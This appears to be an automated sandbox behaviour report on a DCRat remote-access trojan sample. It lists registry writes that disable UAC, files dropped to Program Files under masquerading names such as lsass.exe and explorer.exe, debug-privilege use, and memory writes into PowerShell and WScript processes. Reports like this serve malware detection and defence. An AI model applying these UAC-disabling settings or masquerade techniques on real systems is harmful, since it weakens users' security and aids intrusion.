Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Default User\services.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Default User\services.exe N/A

DCRat payload

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Detects executables packed with SmartAssembly

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation C:\Users\Default User\services.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation C:\Users\Default User\services.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation C:\Users\Default User\services.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation C:\Users\Default User\services.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation C:\Users\Default User\services.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation C:\Users\Default User\services.exe N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Default User\services.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Default User\services.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Default User\services.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Default User\services.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Default User\services.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Default User\services.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Default User\services.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Default User\services.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Default User\services.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Default User\services.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Default User\services.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Default User\services.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\Internet Explorer\RCX582B.tmp C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
File created C:\Program Files\Windows Portable Devices\explorer.exe C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
File opened for modification C:\Program Files\Windows Portable Devices\explorer.exe C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
File created C:\Program Files (x86)\Internet Explorer\lsass.exe C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
File opened for modification C:\Program Files\Windows Portable Devices\RCX51EB.tmp C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
File opened for modification C:\Program Files\Windows Portable Devices\RCX51FB.tmp C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
File created C:\Program Files\Windows Portable Devices\7a0fd90576e088 C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
File created C:\Program Files (x86)\Internet Explorer\6203df4a6bafc7 C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
File opened for modification C:\Program Files (x86)\Internet Explorer\RCX582A.tmp C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
File opened for modification C:\Program Files (x86)\Internet Explorer\lsass.exe C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings C:\Users\Default User\services.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings C:\Users\Default User\services.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings C:\Users\Default User\services.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings C:\Users\Default User\services.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings C:\Users\Default User\services.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings C:\Users\Default User\services.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\services.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\services.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\services.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\services.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\services.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\services.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 600 wrote to memory of 660 N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 600 wrote to memory of 660 N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 600 wrote to memory of 1240 N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 600 wrote to memory of 1240 N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 600 wrote to memory of 1496 N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 600 wrote to memory of 1496 N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 600 wrote to memory of 3960 N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 600 wrote to memory of 3960 N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 600 wrote to memory of 3296 N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 600 wrote to memory of 3296 N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 600 wrote to memory of 3464 N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 600 wrote to memory of 3464 N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 600 wrote to memory of 224 N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 600 wrote to memory of 224 N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 600 wrote to memory of 4780 N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 600 wrote to memory of 4780 N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 600 wrote to memory of 1724 N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 600 wrote to memory of 1724 N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 600 wrote to memory of 3816 N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 600 wrote to memory of 3816 N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 600 wrote to memory of 4356 N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 600 wrote to memory of 4356 N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 600 wrote to memory of 5040 N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe C:\Users\Default User\services.exe
PID 600 wrote to memory of 5040 N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe C:\Users\Default User\services.exe
PID 5040 wrote to memory of 5592 N/A C:\Users\Default User\services.exe C:\Windows\System32\WScript.exe
PID 5040 wrote to memory of 5592 N/A C:\Users\Default User\services.exe C:\Windows\System32\WScript.exe
PID 5040 wrote to memory of 5644 N/A C:\Users\Default User\services.exe C:\Windows\System32\WScript.exe
PID 5040 wrote to memory of 5644 N/A C:\Users\Default User\services.exe C:\Windows\System32\WScript.exe
PID 5592 wrote to memory of 5804 N/A C:\Windows\System32\WScript.exe C:\Users\Default User\services.exe
PID 5592 wrote to memory of 5804 N/A C:\Windows\System32\WScript.exe C:\Users\Default User\services.exe
PID 5804 wrote to memory of 5980 N/A C:\Users\Default User\services.exe C:\Windows\System32\WScript.exe
PID 5804 wrote to memory of 5980 N/A C:\Users\Default User\services.exe C:\Windows\System32\WScript.exe
PID 5804 wrote to memory of 6028 N/A C:\Users\Default User\services.exe C:\Windows\System32\WScript.exe
PID 5804 wrote to memory of 6028 N/A C:\Users\Default User\services.exe C:\Windows\System32\WScript.exe
PID 5980 wrote to memory of 6124 N/A C:\Windows\System32\WScript.exe C:\Users\Default User\services.exe
PID 5980 wrote to memory of 6124 N/A C:\Windows\System32\WScript.exe C:\Users\Default User\services.exe
PID 6124 wrote to memory of 5080 N/A C:\Users\Default User\services.exe C:\Windows\System32\WScript.exe
PID 6124 wrote to memory of 5080 N/A C:\Users\Default User\services.exe C:\Windows\System32\WScript.exe
PID 6124 wrote to memory of 884 N/A C:\Users\Default User\services.exe C:\Windows\System32\WScript.exe
PID 6124 wrote to memory of 884 N/A C:\Users\Default User\services.exe C:\Windows\System32\WScript.exe
PID 5080 wrote to memory of 4780 N/A C:\Windows\System32\WScript.exe C:\Users\Default User\services.exe
PID 5080 wrote to memory of 4780 N/A C:\Windows\System32\WScript.exe C:\Users\Default User\services.exe
PID 4780 wrote to memory of 3380 N/A C:\Users\Default User\services.exe C:\Windows\System32\WScript.exe
PID 4780 wrote to memory of 3380 N/A C:\Users\Default User\services.exe C:\Windows\System32\WScript.exe
PID 4780 wrote to memory of 560 N/A C:\Users\Default User\services.exe C:\Windows\System32\WScript.exe
PID 4780 wrote to memory of 560 N/A C:\Users\Default User\services.exe C:\Windows\System32\WScript.exe
PID 3380 wrote to memory of 2416 N/A C:\Windows\System32\WScript.exe C:\Users\Default User\services.exe
PID 3380 wrote to memory of 2416 N/A C:\Windows\System32\WScript.exe C:\Users\Default User\services.exe
PID 2416 wrote to memory of 4680 N/A C:\Users\Default User\services.exe C:\Windows\System32\WScript.exe
PID 2416 wrote to memory of 4680 N/A C:\Users\Default User\services.exe C:\Windows\System32\WScript.exe
PID 2416 wrote to memory of 1472 N/A C:\Users\Default User\services.exe C:\Windows\System32\WScript.exe
PID 2416 wrote to memory of 1472 N/A C:\Users\Default User\services.exe C:\Windows\System32\WScript.exe
PID 4680 wrote to memory of 5964 N/A C:\Windows\System32\WScript.exe C:\Users\Default User\services.exe
PID 4680 wrote to memory of 5964 N/A C:\Windows\System32\WScript.exe C:\Users\Default User\services.exe
PID 5964 wrote to memory of 400 N/A C:\Users\Default User\services.exe C:\Windows\System32\WScript.exe
PID 5964 wrote to memory of 400 N/A C:\Users\Default User\services.exe C:\Windows\System32\WScript.exe
PID 5964 wrote to memory of 1056 N/A C:\Users\Default User\services.exe C:\Windows\System32\WScript.exe
PID 5964 wrote to memory of 1056 N/A C:\Users\Default User\services.exe C:\Windows\System32\WScript.exe

System policy modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Default User\services.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Default User\services.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\Default User\services.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\Default User\services.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\Default User\services.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Default User\services.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\Default User\services.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Default User\services.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Default User\services.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\Default User\services.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Default User\services.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Default User\services.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\Default User\services.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Default User\services.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Default User\services.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Default User\services.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Default User\services.exe N/A
